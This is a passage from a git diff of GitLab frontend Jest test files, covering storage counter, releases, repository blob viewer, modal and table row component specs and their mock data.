wrapper.find(ClipboardButton); const findIncomingEmail = () => wrapper.findByTestId('incoming-email'); - const findIncomingEmailLabel = () => wrapper.findByTestId('incoming-email-describer'); + const findIncomingEmailLabel = () => wrapper.findByTestId('incoming-email-label'); const findLoadingIcon = () => wrapper.find(GlLoadingIcon); const findTemplateDropdown = () => wrapper.find(GlDropdown); const findToggle = () => wrapper.find(GlToggle); - const createComponent = ({ props = {}, mountFunction = shallowMount } = {}) => + const createComponent = ({ props = {} } = {}) => extendedWrapper( - mountFunction(ServiceDeskSetting, { + mount(ServiceDeskSetting, { propsData: { isEnabled: true, ...props, @@ -131,8 +131,7 @@ describe('ServiceDeskSetting', () => { it('shows error when value contains uppercase or special chars', async () => { wrapper = createComponent({ - props: { customEmailEnabled: true }, - mountFunction: mount, + props: { email: 'foo@bar.com', customEmailEnabled: true }, }); const input = wrapper.findByTestId('project-suffix'); @@ -142,7 +141,7 @@ describe('ServiceDeskSetting', () => { await wrapper.vm.$nextTick(); - const errorText = wrapper.find('.text-danger'); + const errorText = wrapper.find('.invalid-feedback'); expect(errorText.exists()).toBe(true); }); }); diff --git a/spec/frontend/projects/storage_counter/components/app_spec.js b/spec/frontend/projects/storage_counter/components/app_spec.js deleted file mode 100644 index f3da01e0602..00000000000 --- a/spec/frontend/projects/storage_counter/components/app_spec.js +++ /dev/null @@ -1,150 +0,0 @@ -import { GlAlert, GlLoadingIcon } from '@gitlab/ui'; -import { shallowMount, createLocalVue } from '@vue/test-utils'; -import VueApollo from 'vue-apollo'; -import createMockApollo from 'helpers/mock_apollo_helper'; -import { extendedWrapper } from 'helpers/vue_test_utils_helper'; -import waitForPromises from 'helpers/wait_for_promises'; -import StorageCounterApp from 
'~/projects/storage_counter/components/app.vue'; -import { TOTAL_USAGE_DEFAULT_TEXT } from '~/projects/storage_counter/constants'; -import getProjectStorageCount from '~/projects/storage_counter/queries/project_storage.query.graphql'; -import UsageGraph from '~/vue_shared/components/storage_counter/usage_graph.vue'; -import { - mockGetProjectStorageCountGraphQLResponse, - mockEmptyResponse, - projectData, - defaultProvideValues, -} from '../mock_data'; - -const localVue = createLocalVue(); -localVue.use(VueApollo); - -describe('Storage counter app', () => { - let wrapper; - - const createMockApolloProvider = ({ reject = false, mockedValue } = {}) => { - let response; - - if (reject) { - response = jest.fn().mockRejectedValue(mockedValue || new Error('GraphQL error')); - } else { - response = jest.fn().mockResolvedValue(mockedValue); - } - - const requestHandlers = [[getProjectStorageCount, response]]; - - return createMockApollo(requestHandlers); - }; - - const createComponent = ({ provide = {}, mockApollo } = {}) => { - wrapper = extendedWrapper( - shallowMount(StorageCounterApp, { - localVue, - apolloProvider: mockApollo, - provide: { - ...defaultProvideValues, - ...provide, - }, - }), - ); - }; - - const findAlert = () => wrapper.findComponent(GlAlert); - const findLoadingIcon = () => wrapper.findComponent(GlLoadingIcon); - const findUsagePercentage = () => wrapper.findByTestId('total-usage'); - const findUsageQuotasHelpLink = () => wrapper.findByTestId('usage-quotas-help-link'); - const findUsageGraph = () => wrapper.findComponent(UsageGraph); - - afterEach(() => { - wrapper.destroy(); - }); - - describe('with apollo fetching successful', () => { - let mockApollo; - - beforeEach(async () => { - mockApollo = createMockApolloProvider({ - mockedValue: mockGetProjectStorageCountGraphQLResponse, - }); - createComponent({ mockApollo }); - await waitForPromises(); - }); - - it('renders correct total usage', () => { - 
expect(findUsagePercentage().text()).toBe(projectData.storage.totalUsage); - }); - - it('renders correct usage quotas help link', () => { - expect(findUsageQuotasHelpLink().attributes('href')).toBe( - defaultProvideValues.helpLinks.usageQuotasHelpPagePath, - ); - }); - }); - - describe('with apollo loading', () => { - let mockApollo; - - beforeEach(() => { - mockApollo = createMockApolloProvider({ - mockedValue: new Promise(() => {}), - }); - createComponent({ mockApollo }); - }); - - it('should show loading icon', () => { - expect(findLoadingIcon().exists()).toBe(true); - }); - }); - - describe('with apollo returning empty data', () => { - let mockApollo; - - beforeEach(async () => { - mockApollo = createMockApolloProvider({ - mockedValue: mockEmptyResponse, - }); - createComponent({ mockApollo }); - await waitForPromises(); - }); - - it('shows default text for total usage', () => { - expect(findUsagePercentage().text()).toBe(TOTAL_USAGE_DEFAULT_TEXT); - }); - }); - - describe('with apollo fetching error', () => { - let mockApollo; - - beforeEach(() => { - mockApollo = createMockApolloProvider(); - createComponent({ mockApollo, reject: true }); - }); - - it('renders gl-alert', () => { - expect(findAlert().exists()).toBe(true); - }); - }); - - describe('rendering <usage-graph />', () => { - let mockApollo; - - beforeEach(async () => { - mockApollo = createMockApolloProvider({ - mockedValue: mockGetProjectStorageCountGraphQLResponse, - }); - createComponent({ mockApollo }); - await waitForPromises(); - }); - - it('renders usage-graph component if project.statistics exists', () => { - expect(findUsageGraph().exists()).toBe(true); - }); - - it('passes project.statistics to usage-graph component', () => { - const { - __typename, - ...statistics - } = mockGetProjectStorageCountGraphQLResponse.data.project.statistics; - expect(findUsageGraph().props('rootStorageStatistics')).toMatchObject(statistics); - }); - }); -}); diff --git 
a/spec/frontend/projects/storage_counter/components/storage_table_spec.js b/spec/frontend/projects/storage_counter/components/storage_table_spec.js deleted file mode 100644 index c9e56d8f033..00000000000 --- a/spec/frontend/projects/storage_counter/components/storage_table_spec.js +++ /dev/null @@ -1,63 +0,0 @@ -import { GlTableLite } from '@gitlab/ui'; -import { mount } from '@vue/test-utils'; -import { extendedWrapper } from 'helpers/vue_test_utils_helper'; -import StorageTable from '~/projects/storage_counter/components/storage_table.vue'; -import { projectData, defaultProvideValues } from '../mock_data'; - -describe('StorageTable', () => { - let wrapper; - - const defaultProps = { - storageTypes: projectData.storage.storageTypes, - }; - - const createComponent = (props = {}) => { - wrapper = extendedWrapper( - mount(StorageTable, { - propsData: { - ...defaultProps, - ...props, - }, - }), - ); - }; - - const findTable = () => wrapper.findComponent(GlTableLite); - - beforeEach(() => { - createComponent(); - }); - afterEach(() => { - wrapper.destroy(); - }); - - describe('with storage types', () => { - it.each(projectData.storage.storageTypes)( - 'renders table row correctly %o', - ({ storageType: { id, name, description } }) => { - expect(wrapper.findByTestId(`${id}-name`).text()).toBe(name); - expect(wrapper.findByTestId(`${id}-description`).text()).toBe(description); - expect(wrapper.findByTestId(`${id}-icon`).props('name')).toBe(id); - expect(wrapper.findByTestId(`${id}-help-link`).attributes('href')).toBe( - defaultProvideValues.helpLinks[id.replace(`Size`, `HelpPagePath`)] - .replace(`Size`, ``) - .replace(/[A-Z]/g, (m) => `-${m.toLowerCase()}`), - ); - }, - ); - }); - - describe('without storage types', () => { - beforeEach(() => { - createComponent({ storageTypes: [] }); - }); - - it('should render the table header <th>', () => { - expect(findTable().find('th').exists()).toBe(true); - }); - - it('should not render any table data <td>', () => { - 
expect(findTable().find('td').exists()).toBe(false); - }); - }); -}); diff --git a/spec/frontend/projects/storage_counter/components/storage_type_icon_spec.js b/spec/frontend/projects/storage_counter/components/storage_type_icon_spec.js deleted file mode 100644 index 01efd6f14bd..00000000000 --- a/spec/frontend/projects/storage_counter/components/storage_type_icon_spec.js +++ /dev/null @@ -1,41 +0,0 @@ -import { mount } from '@vue/test-utils'; -import { GlIcon } from '@gitlab/ui'; -import StorageTypeIcon from '~/projects/storage_counter/components/storage_type_icon.vue'; - -describe('StorageTypeIcon', () => { - let wrapper; - - const createComponent = (props = {}) => { - wrapper = mount(StorageTypeIcon, { - propsData: { - ...props, - }, - }); - }; - - const findGlIcon = () => wrapper.findComponent(GlIcon); - - describe('rendering icon', () => { - afterEach(() => { - wrapper.destroy(); - }); - - it.each` - expected | provided - ${'doc-image'} | ${'lfsObjectsSize'} - ${'snippet'} | ${'snippetsSize'} - ${'infrastructure-registry'} | ${'repositorySize'} - ${'package'} | ${'packagesSize'} - ${'upload'} | ${'uploadsSize'} - ${'disk'} | ${'wikiSize'} - ${'disk'} | ${'anything-else'} - `( - 'renders icon with name of $expected when name prop is $provided', - ({ expected, provided }) => { - createComponent({ name: provided }); - - expect(findGlIcon().props('name')).toBe(expected); - }, - ); - }); -}); diff --git a/spec/frontend/projects/storage_counter/mock_data.js b/spec/frontend/projects/storage_counter/mock_data.js deleted file mode 100644 index 6b3e23ac386..00000000000 --- a/spec/frontend/projects/storage_counter/mock_data.js +++ /dev/null @@ -1,92 +0,0 @@ -import mockGetProjectStorageCountGraphQLResponse from 'test_fixtures/graphql/projects/storage_counter/project_storage.query.graphql.json'; - -export { mockGetProjectStorageCountGraphQLResponse }; - -export const mockEmptyResponse = { data: { project: null } }; - -export const defaultProvideValues = { - projectPath: 
'/project-path', - helpLinks: { - usageQuotasHelpPagePath: '/usage-quotas', - buildArtifactsHelpPagePath: '/build-artifacts', - lfsObjectsHelpPagePath: '/lsf-objects', - packagesHelpPagePath: '/packages', - repositoryHelpPagePath: '/repository', - snippetsHelpPagePath: '/snippets', - uploadsHelpPagePath: '/uploads', - wikiHelpPagePath: '/wiki', - }, -}; - -export const projectData = { - storage: { - totalUsage: '13.8 MiB', - storageTypes: [ - { - storageType: { - id: 'buildArtifactsSize', - name: 'Artifacts', - description: 'Pipeline artifacts and job artifacts, created with CI/CD.', - warningMessage: - 'Because of a known issue, the artifact total for some projects may be incorrect. For more details, read %{warningLinkStart}the epic%{warningLinkEnd}.', - helpPath: '/build-artifacts', - }, - value: 400000, - }, - { - storageType: { - id: 'lfsObjectsSize', - name: 'LFS storage', - description: 'Audio samples, videos, datasets, and graphics.', - helpPath: '/lsf-objects', - }, - value: 4800000, - }, - { - storageType: { - id: 'packagesSize', - name: 'Packages', - description: 'Code packages and container images.', - helpPath: '/packages', - }, - value: 3800000, - }, - { - storageType: { - id: 'repositorySize', - name: 'Repository', - description: 'Git repository.', - helpPath: '/repository', - }, - value: 3900000, - }, - { - storageType: { - id: 'snippetsSize', - name: 'Snippets', - description: 'Shared bits of code and text.', - helpPath: '/snippets', - }, - value: 0, - }, - { - storageType: { - id: 'uploadsSize', - name: 'Uploads', - description: 'File attachments and smaller design graphics.', - helpPath: '/uploads', - }, - value: 900000, - }, - { - storageType: { - id: 'wikiSize', - name: 'Wiki', - description: 'Wiki content.', - helpPath: '/wiki', - }, - value: 300000, - }, - ], - }, -}; diff --git a/spec/frontend/projects/storage_counter/utils_spec.js b/spec/frontend/projects/storage_counter/utils_spec.js deleted file mode 100644 index fb91975a3cf..00000000000 
--- a/spec/frontend/projects/storage_counter/utils_spec.js +++ /dev/null @@ -1,34 +0,0 @@ -import { parseGetProjectStorageResults } from '~/projects/storage_counter/utils'; -import { - mockGetProjectStorageCountGraphQLResponse, - projectData, - defaultProvideValues, -} from './mock_data'; - -describe('parseGetProjectStorageResults', () => { - it('parses project statistics correctly', () => { - expect( - parseGetProjectStorageResults( - mockGetProjectStorageCountGraphQLResponse.data, - defaultProvideValues.helpLinks, - ), - ).toMatchObject(projectData); - }); - - it('includes storage type with size of 0 in returned value', () => { - const mockedResponse = mockGetProjectStorageCountGraphQLResponse.data; - // ensuring a specific storage type item has size of 0 - mockedResponse.project.statistics.repositorySize = 0; - - const response = parseGetProjectStorageResults(mockedResponse, defaultProvideValues.helpLinks); - - expect(response.storage.storageTypes).toEqual( - expect.arrayContaining([ - { - storageType: expect.any(Object), - value: 0, - }, - ]), - ); - }); -}); diff --git a/spec/frontend/releases/__snapshots__/util_spec.js.snap b/spec/frontend/releases/__snapshots__/util_spec.js.snap index b2580d47549..fd2a8eec4d4 100644 --- a/spec/frontend/releases/__snapshots__/util_spec.js.snap +++ b/spec/frontend/releases/__snapshots__/util_spec.js.snap @@ -44,6 +44,7 @@ Object { "author": Object { "__typename": "UserCore", "avatarUrl": "https://www.gravatar.com/avatar/16f8e2050ce10180ca571c2eb19cfce2?s=80&d=identicon", + "id": Any<String>, "username": "administrator", "webUrl": "http://localhost/administrator", }, @@ -139,6 +140,7 @@ Object { "author": Object { "__typename": "UserCore", "avatarUrl": "https://www.gravatar.com/avatar/16f8e2050ce10180ca571c2eb19cfce2?s=80&d=identicon", + "id": Any<String>, "username": "administrator", "webUrl": "http://localhost/administrator", }, @@ -153,6 +155,7 @@ Object { "__typename": "ReleaseEvidence", "collectedAt": 
"2018-12-03T00:00:00Z", "filepath": "http://localhost/releases-namespace/releases-project/-/releases/v1.1/evidences/1.json", + "id": "gid://gitlab/Releases::Evidence/1", "sha": "760d6cdfb0879c3ffedec13af470e0f71cf52c6cde4d", }, ], @@ -247,6 +250,7 @@ Object { "evidences": Array [], "milestones": Array [ Object { + "id": "gid://gitlab/Milestone/123", "issueStats": Object {}, "stats": undefined, "title": "12.3", @@ -254,6 +258,7 @@ Object { "webUrl": undefined, }, Object { + "id": "gid://gitlab/Milestone/124", "issueStats": Object {}, "stats": undefined, "title": "12.4", @@ -347,6 +352,7 @@ Object { "author": Object { "__typename": "UserCore", "avatarUrl": "https://www.gravatar.com/avatar/16f8e2050ce10180ca571c2eb19cfce2?s=80&d=identicon", + "id": Any<String>, "username": "administrator", "webUrl": "http://localhost/administrator", }, @@ -361,6 +367,7 @@ Object { "__typename": "ReleaseEvidence", "collectedAt": "2018-12-03T00:00:00Z", "filepath": "http://localhost/releases-namespace/releases-project/-/releases/v1.1/evidences/1.json", + "id": "gid://gitlab/Releases::Evidence/1", "sha": "760d6cdfb0879c3ffedec13af470e0f71cf52c6cde4d", }, ], diff --git a/spec/frontend/releases/components/app_show_spec.js b/spec/frontend/releases/components/app_show_spec.js index 72ebaaaf76c..a60b9bda66a 100644 --- a/spec/frontend/releases/components/app_show_spec.js +++ b/spec/frontend/releases/components/app_show_spec.js @@ -58,7 +58,6 @@ describe('Release show component', () => { const expectFlashWithMessage = (message) => { it(`shows a flash message that reads "${message}"`, () => { - expect(createFlash).toHaveBeenCalledTimes(1); expect(createFlash).toHaveBeenCalledWith({ message, captureError: true, diff --git a/spec/frontend/releases/util_spec.js b/spec/frontend/releases/util_spec.js index 3c1060cb0e8..055c8e8b39f 100644 --- a/spec/frontend/releases/util_spec.js +++ b/spec/frontend/releases/util_spec.js @@ -104,13 +104,32 @@ describe('releases/util.js', () => { 
describe('convertAllReleasesGraphQLResponse', () => { it('matches snapshot', () => { - expect(convertAllReleasesGraphQLResponse(originalAllReleasesQueryResponse)).toMatchSnapshot(); + expect(convertAllReleasesGraphQLResponse(originalAllReleasesQueryResponse)).toMatchSnapshot({ + data: [ + { + author: { + id: expect.any(String), + }, + }, + { + author: { + id: expect.any(String), + }, + }, + ], + }); }); }); describe('convertOneReleaseGraphQLResponse', () => { it('matches snapshot', () => { - expect(convertOneReleaseGraphQLResponse(originalOneReleaseQueryResponse)).toMatchSnapshot(); + expect(convertOneReleaseGraphQLResponse(originalOneReleaseQueryResponse)).toMatchSnapshot({ + data: { + author: { + id: expect.any(String), + }, + }, + }); }); }); diff --git a/spec/frontend/repository/commits_service_spec.js b/spec/frontend/repository/commits_service_spec.js index d924974aede..697fa7c4fd1 100644 --- a/spec/frontend/repository/commits_service_spec.js +++ b/spec/frontend/repository/commits_service_spec.js @@ -52,13 +52,6 @@ describe('commits service', () => { expect(axios.get.mock.calls.length).toEqual(1); }); - it('calls axios get twice if an offset is larger than 25', async () => { - await requestCommits(100); - - expect(axios.get.mock.calls[0][1]).toEqual({ params: { format: 'json', offset: 75 } }); - expect(axios.get.mock.calls[1][1]).toEqual({ params: { format: 'json', offset: 100 } }); - }); - it('updates the list of requested offsets', async () => { await requestCommits(200); diff --git a/spec/frontend/repository/components/__snapshots__/last_commit_spec.js.snap b/spec/frontend/repository/components/__snapshots__/last_commit_spec.js.snap index be4f8a688e0..7854325e4ed 100644 --- a/spec/frontend/repository/components/__snapshots__/last_commit_spec.js.snap +++ b/spec/frontend/repository/components/__snapshots__/last_commit_spec.js.snap @@ -2,7 +2,7 @@ exports[`Repository last commit component renders commit widget 1`] = ` <div - class="info-well d-none d-sm-flex 
project-last-commit commit p-3" + class="well-segment commit gl-p-5 gl-w-full" > <user-avatar-link-stub class="avatar-cell" @@ -99,6 +99,7 @@ exports[`Repository last commit component renders commit widget 1`] = ` text="123456789" title="Copy commit SHA" tooltipplacement="top" + variant="default" /> </gl-button-group-stub> </div> @@ -108,7 +109,7 @@ exports[`Repository last commit component renders commit widget 1`] = ` exports[`Repository last commit component renders the signature HTML as returned by the backend 1`] = ` <div - class="info-well d-none d-sm-flex project-last-commit commit p-3" + class="well-segment commit gl-p-5 gl-w-full" > <user-avatar-link-stub class="avatar-cell" @@ -209,6 +210,7 @@ exports[`Repository last commit component renders the signature HTML as returned text="123456789" title="Copy commit SHA" tooltipplacement="top" + variant="default" /> </gl-button-group-stub> </div> diff --git a/spec/frontend/repository/components/blob_button_group_spec.js b/spec/frontend/repository/components/blob_button_group_spec.js index f2a3354f204..9f9d574a8ed 100644 --- a/spec/frontend/repository/components/blob_button_group_spec.js +++ b/spec/frontend/repository/components/blob_button_group_spec.js @@ -9,6 +9,7 @@ const DEFAULT_PROPS = { name: 'some name', path: 'some/path', canPushCode: true, + canPushToBranch: true, replacePath: 'some/replace/path', deletePath: 'some/delete/path', emptyRepo: false, diff --git a/spec/frontend/repository/components/blob_content_viewer_spec.js b/spec/frontend/repository/components/blob_content_viewer_spec.js index d40e97bf5a3..9e00a2d0408 100644 --- a/spec/frontend/repository/components/blob_content_viewer_spec.js +++ b/spec/frontend/repository/components/blob_content_viewer_spec.js @@ -15,7 +15,7 @@ import ForkSuggestion from '~/repository/components/fork_suggestion.vue'; import { loadViewer, viewerProps } from '~/repository/components/blob_viewers'; import DownloadViewer from 
'~/repository/components/blob_viewers/download_viewer.vue'; import EmptyViewer from '~/repository/components/blob_viewers/empty_viewer.vue'; -import TextViewer from '~/repository/components/blob_viewers/text_viewer.vue'; +import SourceViewer from '~/vue_shared/components/source_viewer.vue'; import blobInfoQuery from '~/repository/queries/blob_info.query.graphql'; import { redirectTo } from '~/lib/utils/url_utility'; import { isLoggedIn } from '~/lib/utils/common_utils'; @@ -98,7 +98,7 @@ describe('Blob content viewer component', () => { const findForkSuggestion = () => wrapper.findComponent(ForkSuggestion); beforeEach(() => { - gon.features = { refactorTextViewer: true }; + gon.features = { highlightJs: true }; isLoggedIn.mockReturnValue(true); }); @@ -215,7 +215,7 @@ describe('Blob content viewer component', () => { viewer | loadViewerReturnValue | viewerPropsReturnValue ${'empty'} | ${EmptyViewer} | ${{}} ${'download'} | ${DownloadViewer} | ${{ filePath: '/some/file/path', fileName: 'test.js', fileSize: 100 }} - ${'text'} | ${TextViewer} | ${{ content: 'test', fileName: 'test.js', readOnly: true }} + ${'text'} | ${SourceViewer} | ${{ content: 'test', autoDetect: true }} `( 'renders viewer component for $viewer files', async ({ viewer, loadViewerReturnValue, viewerPropsReturnValue }) => { @@ -318,8 +318,14 @@ describe('Blob content viewer component', () => { repository: { empty }, } = projectMock; + afterEach(() => { + delete gon.current_user_id; + delete gon.current_username; + }); + it('renders component', async () => { window.gon.current_user_id = 1; + window.gon.current_username = 'root'; await createComponent({ pushCode, downloadCode, empty }, mount); @@ -330,28 +336,34 @@ describe('Blob content viewer component', () => { deletePath: webPath, canPushCode: pushCode, canLock: true, - isLocked: false, + isLocked: true, emptyRepo: empty, }); }); it.each` - canPushCode | canDownloadCode | canLock - ${true} | ${true} | ${true} - ${false} | ${true} | ${false} - 
${true} | ${false} | ${false} - `('passes the correct lock states', async ({ canPushCode, canDownloadCode, canLock }) => { - await createComponent( - { - pushCode: canPushCode, - downloadCode: canDownloadCode, - empty, - }, - mount, - ); + canPushCode | canDownloadCode | username | canLock + ${true} | ${true} | ${'root'} | ${true} + ${false} | ${true} | ${'root'} | ${false} + ${true} | ${false} | ${'root'} | ${false} + ${true} | ${true} | ${'peter'} | ${false} + `( + 'passes the correct lock states', + async ({ canPushCode, canDownloadCode, username, canLock }) => { + gon.current_username = username; + + await createComponent( + { + pushCode: canPushCode, + downloadCode: canDownloadCode, + empty, + }, + mount, + ); - expect(findBlobButtonGroup().props('canLock')).toBe(canLock); - }); + expect(findBlobButtonGroup().props('canLock')).toBe(canLock); + }, + ); it('does not render if not logged in', async () => { isLoggedIn.mockReturnValueOnce(false); diff --git a/spec/frontend/repository/components/blob_viewers/pdf_viewer_spec.js b/spec/frontend/repository/components/blob_viewers/pdf_viewer_spec.js new file mode 100644 index 00000000000..fd910002529 --- /dev/null +++ b/spec/frontend/repository/components/blob_viewers/pdf_viewer_spec.js @@ -0,0 +1,59 @@ +import { GlButton } from '@gitlab/ui'; +import Component from '~/repository/components/blob_viewers/pdf_viewer.vue'; +import PdfViewer from '~/blob/pdf/pdf_viewer.vue'; +import { shallowMountExtended } from 'helpers/vue_test_utils_helper'; + +describe('PDF Viewer', () => { + let wrapper; + + const defaultPropsData = { url: 'some/pdf_blob.pdf' }; + + const createComponent = (fileSize = 999) => { + wrapper = shallowMountExtended(Component, { propsData: { ...defaultPropsData, fileSize } }); + }; + + const findPDFViewer = () => wrapper.findComponent(PdfViewer); + const findHelpText = () => wrapper.find('p'); + const findDownLoadButton = () => wrapper.findComponent(GlButton); + + it('renders a PDF Viewer component', () => { 
+ createComponent(); + + expect(findPDFViewer().exists()).toBe(true); + expect(findPDFViewer().props('pdf')).toBe(defaultPropsData.url); + }); + + describe('Too large', () => { + beforeEach(() => createComponent(20000000)); + + it('does not a PDF Viewer component', () => { + expect(findPDFViewer().exists()).toBe(false); + }); + + it('renders help text', () => { + expect(findHelpText().text()).toBe( + 'This PDF is too large to display. Please download to view.', + ); + }); + + it('renders a download button', () => { + expect(findDownLoadButton().text()).toBe('Download PDF'); + expect(findDownLoadButton().props('icon')).toBe('download'); + }); + }); + + describe('Too many pages', () => { + beforeEach(() => { + createComponent(); + findPDFViewer().vm.$emit('pdflabload', 100); + }); + + it('does not a PDF Viewer component', () => { + expect(findPDFViewer().exists()).toBe(false); + }); + + it('renders a download button', () => { + expect(findDownLoadButton().exists()).toBe(true); + }); + }); +}); diff --git a/spec/frontend/repository/components/blob_viewers/text_viewer_spec.js b/spec/frontend/repository/components/blob_viewers/text_viewer_spec.js deleted file mode 100644 index 88c5bee6564..00000000000 --- a/spec/frontend/repository/components/blob_viewers/text_viewer_spec.js +++ /dev/null @@ -1,30 +0,0 @@ -import { shallowMount } from '@vue/test-utils'; -import waitForPromises from 'helpers/wait_for_promises'; -import TextViewer from '~/repository/components/blob_viewers/text_viewer.vue'; -import SourceEditor from '~/vue_shared/components/source_editor.vue'; - -describe('Text Viewer', () => { - let wrapper; - const propsData = { - content: 'Some content', - fileName: 'file_name.js', - readOnly: true, - }; - - const createComponent = () => { - wrapper = shallowMount(TextViewer, { propsData }); - }; - - const findEditor = () => wrapper.findComponent(SourceEditor); - - it('renders a Source Editor component', async () => { - createComponent(); - - await waitForPromises(); - 
- expect(findEditor().exists()).toBe(true); - expect(findEditor().props('value')).toBe(propsData.content); - expect(findEditor().props('fileName')).toBe(propsData.fileName); - expect(findEditor().props('editorOptions')).toEqual({ readOnly: propsData.readOnly }); - }); -}); diff --git a/spec/frontend/repository/components/delete_blob_modal_spec.js b/spec/frontend/repository/components/delete_blob_modal_spec.js index 2c62868f391..785783b2e75 100644 --- a/spec/frontend/repository/components/delete_blob_modal_spec.js +++ b/spec/frontend/repository/components/delete_blob_modal_spec.js @@ -13,6 +13,7 @@ const initialProps = { targetBranch: 'some-target-branch', originalBranch: 'main', canPushCode: true, + canPushToBranch: true, emptyRepo: false, }; @@ -103,22 +104,25 @@ describe('DeleteBlobModal', () => { ); it.each` - input | value | emptyRepo | canPushCode | exist - ${'authenticity_token'} | ${'mock-csrf-token'} | ${false} | ${true} | ${true} - ${'authenticity_token'} | ${'mock-csrf-token'} | ${true} | ${false} | ${true} - ${'_method'} | ${'delete'} | ${false} | ${true} | ${true} - ${'_method'} | ${'delete'} | ${true} | ${false} | ${true} - ${'original_branch'} | ${initialProps.originalBranch} | ${false} | ${true} | ${true} - ${'original_branch'} | ${undefined} | ${true} | ${true} | ${false} - ${'create_merge_request'} | ${'1'} | ${false} | ${false} | ${true} - ${'create_merge_request'} | ${'1'} | ${false} | ${true} | ${true} - ${'create_merge_request'} | ${undefined} | ${true} | ${false} | ${false} + input | value | emptyRepo | canPushCode | canPushToBranch | exist + ${'authenticity_token'} | ${'mock-csrf-token'} | ${false} | ${true} | ${true} | ${true} + ${'authenticity_token'} | ${'mock-csrf-token'} | ${true} | ${false} | ${true} | ${true} + ${'_method'} | ${'delete'} | ${false} | ${true} | ${true} | ${true} + ${'_method'} | ${'delete'} | ${true} | ${false} | ${true} | ${true} + ${'original_branch'} | ${initialProps.originalBranch} | ${false} | ${true} | ${true} | 
${true} + ${'original_branch'} | ${undefined} | ${true} | ${true} | ${true} | ${false} + ${'create_merge_request'} | ${'1'} | ${false} | ${false} | ${true} | ${true} + ${'create_merge_request'} | ${'1'} | ${false} | ${true} | ${true} | ${true} + ${'create_merge_request'} | ${'1'} | ${false} | ${false} | ${false} | ${true} + ${'create_merge_request'} | ${'1'} | ${false} | ${false} | ${true} | ${true} + ${'create_merge_request'} | ${undefined} | ${true} | ${false} | ${true} | ${false} `( 'passes $input as a hidden input with the correct value', - ({ input, value, emptyRepo, canPushCode, exist }) => { + ({ input, value, emptyRepo, canPushCode, canPushToBranch, exist }) => { createComponent({ emptyRepo, canPushCode, + canPushToBranch, }); const inputMethod = findForm().find(`input[name="${input}"]`); diff --git a/spec/frontend/repository/components/table/row_spec.js b/spec/frontend/repository/components/table/row_spec.js index 76e9f7da011..7f59dbfe0d1 100644 --- a/spec/frontend/repository/components/table/row_spec.js +++ b/spec/frontend/repository/components/table/row_spec.js @@ -4,6 +4,7 @@ import { createMockDirective, getBinding } from 'helpers/vue_mock_directive'; import TableRow from '~/repository/components/table/row.vue'; import FileIcon from '~/vue_shared/components/file_icon.vue'; import { FILE_SYMLINK_MODE } from '~/vue_shared/constants'; +import { ROW_APPEAR_DELAY } from '~/repository/constants'; const COMMIT_MOCK = { lockLabel: 'Locked by Root', committedDate: '2019-01-01' }; @@ -17,12 +18,12 @@ function factory(propsData = {}) { vm = shallowMount(TableRow, { propsData: { + commitInfo: COMMIT_MOCK, ...propsData, name: propsData.path, projectPath: 'gitlab-org/gitlab-ce', url: `https://test.com`, totalEntries: 10, - commitInfo: COMMIT_MOCK, rowNumber: 123, }, directives: { @@ -251,6 +252,8 @@ describe('Repository table row component', () => { }); describe('row visibility', () => { + beforeAll(() => jest.useFakeTimers()); + beforeEach(() => { factory({ id: 
'1', @@ -258,18 +261,20 @@ describe('Repository table row component', () => { path: 'test', type: 'tree', currentPath: '/', + commitInfo: null, }); }); - it('emits a `row-appear` event', () => { + + afterAll(() => jest.useRealTimers()); + + it('emits a `row-appear` event', async () => { findIntersectionObserver().vm.$emit('appear'); - expect(vm.emitted('row-appear')).toEqual([ - [ - { - hasCommit: true, - rowNumber: 123, - }, - ], - ]); + + jest.runAllTimers(); + + expect(setTimeout).toHaveBeenCalledTimes(1); + expect(setTimeout).toHaveBeenLastCalledWith(expect.any(Function), ROW_APPEAR_DELAY); + expect(vm.emitted('row-appear')).toEqual([[123]]); }); }); }); diff --git a/spec/frontend/repository/components/tree_content_spec.js b/spec/frontend/repository/components/tree_content_spec.js index 49397c77215..9c5d07eede3 100644 --- a/spec/frontend/repository/components/tree_content_spec.js +++ b/spec/frontend/repository/components/tree_content_spec.js @@ -2,7 +2,7 @@ import { shallowMount } from '@vue/test-utils'; import paginatedTreeQuery from 'shared_queries/repository/paginated_tree.query.graphql'; import FilePreview from '~/repository/components/preview/index.vue'; import FileTable from '~/repository/components/table/index.vue'; -import TreeContent from '~/repository/components/tree_content.vue'; +import TreeContent from 'jh_else_ce/repository/components/tree_content.vue'; import { loadCommits, isRequested, resetRequestedCommits } from '~/repository/commits_service'; jest.mock('~/repository/commits_service', () => ({ @@ -190,14 +190,28 @@ describe('Repository table component', () => { }); }); - it('loads commit data when row-appear event is emitted', () => { + describe('commit data', () => { const path = 'some/path'; - const rowNumber = 1; - factory(path); - findFileTable().vm.$emit('row-appear', { hasCommit: false, rowNumber }); + it('loads commit data for both top and bottom batches when row-appear event is emitted', () => { + const rowNumber = 50; - 
expect(isRequested).toHaveBeenCalledWith(rowNumber); - expect(loadCommits).toHaveBeenCalledWith('', path, '', rowNumber); + factory(path); + findFileTable().vm.$emit('row-appear', rowNumber); + + expect(isRequested).toHaveBeenCalledWith(rowNumber); + + expect(loadCommits.mock.calls).toEqual([ + ['', path, '', rowNumber], + ['', path, '', rowNumber - 25], + ]); + }); + + it('loads commit data once if rowNumber is zero', () => { + factory(path); + findFileTable().vm.$emit('row-appear', 0); + + expect(loadCommits.mock.calls).toEqual([['', path, '', 0]]); + }); }); }); diff --git a/spec/frontend/repository/components/upload_blob_modal_spec.js b/spec/frontend/repository/components/upload_blob_modal_spec.js index 36847107558..e9dfa3cd495 100644 --- a/spec/frontend/repository/components/upload_blob_modal_spec.js +++ b/spec/frontend/repository/components/upload_blob_modal_spec.js @@ -212,8 +212,8 @@ describe('UploadBlobModal', () => { createComponent(); }); - it('displays the default "Upload New File" modal title ', () => { - expect(findModal().props('title')).toBe('Upload New File'); + it('displays the default "Upload new file" modal title ', () => { + expect(findModal().props('title')).toBe('Upload new file'); }); it('display the defaul primary button text', () => { diff --git a/spec/frontend/repository/mock_data.js b/spec/frontend/repository/mock_data.js index adf5991ac3c..74d35daf578 100644 --- a/spec/frontend/repository/mock_data.js +++ b/spec/frontend/repository/mock_data.js @@ -1,4 +1,5 @@ export const simpleViewerMock = { + id: '1', name: 'some_file.js', size: 123, rawSize: 123, @@ -11,6 +12,7 @@ export const simpleViewerMock = { forkAndEditPath: 'some_file.js/fork/edit', ideForkAndEditPath: 'some_file.js/fork/ide', canModifyBlob: true, + canCurrentUserPushToBranch: true, storedExternally: false, rawPath: 'some_file.js', replacePath: 'some_file.js/replace', @@ -45,7 +47,13 @@ export const 